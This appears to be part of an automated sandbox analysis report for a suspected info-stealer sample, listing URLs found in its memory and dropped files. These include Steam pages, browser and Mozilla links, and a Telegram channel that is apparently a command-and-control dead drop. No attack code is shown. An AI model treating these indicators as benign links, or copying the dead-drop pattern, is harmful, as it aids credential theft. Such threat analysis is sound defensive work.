                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/about/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/explore/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/legal/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/mobile
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/news/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/points/shop/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/stats/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: JDGCFB.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: FHJEGI.2.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2264867503.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2121165868.0000000000E82000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, FHJEGI.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: FHJEGI.2.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjoke
                          Source: UMrFwHyjUi.exe, 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/:
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/BAKFIEGHCB
                          Source: JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2690322571.00000000176CC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2571750793.00000000179E1000.00000004.00000020.00020000.00000000.sdmp, JDGCFB.2.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
